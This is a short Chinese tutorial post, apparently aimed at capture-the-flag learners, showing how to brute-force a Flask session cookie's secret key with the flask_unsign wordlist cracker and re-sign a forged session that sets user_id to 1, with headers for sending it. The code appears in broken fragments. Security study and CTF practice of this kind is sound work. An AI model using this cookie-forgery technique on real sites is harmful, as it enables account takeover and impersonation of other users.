作者:破符
有些web交互中的cookie是加密的,flask_unsign 模块的作用是字典爆破加密cookie的密钥。
python
-
m pip install flask_unsign
m pip install flask_unsign_wordlist
from
flask_unsign
import
Cracker
logger,DEFAULT_WORDLIST
crack
=
Cracker(value
cookie,salt
DEFAULT_SALT,threads
8
)
with wordlist (DEFAULT_WORDLIST) as iterator:
crack.crack(iterator)
if
crack.secret:
logger.success(f
'Found secret key after {crack.attempts} attempts'
session1
ascii(crack.secret)
#如果session1有结果,则该值为爆破出来的私钥
session
sec_session
session.sign(value
"{'_fresh': True, '_id': '<id>', 'csrf_token': '<csrf>', 'user_id': '1'}"
,secret
session1,)
#secret若无特殊要求,值应为爆破cookie生成的session1
#sec_session值为cookie可添加入header头部
顺便提供一下交互用的头部,注意sec_session为新生成的cookie
{
'User-Agent'
:
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36'
,
"Cookie"
"session="
+
}
[CTF入门培训]顶尖高校博士及硕士团队亲授《30小时教你玩转CTF》,视频+靶场+题目!助力进入CTF世界
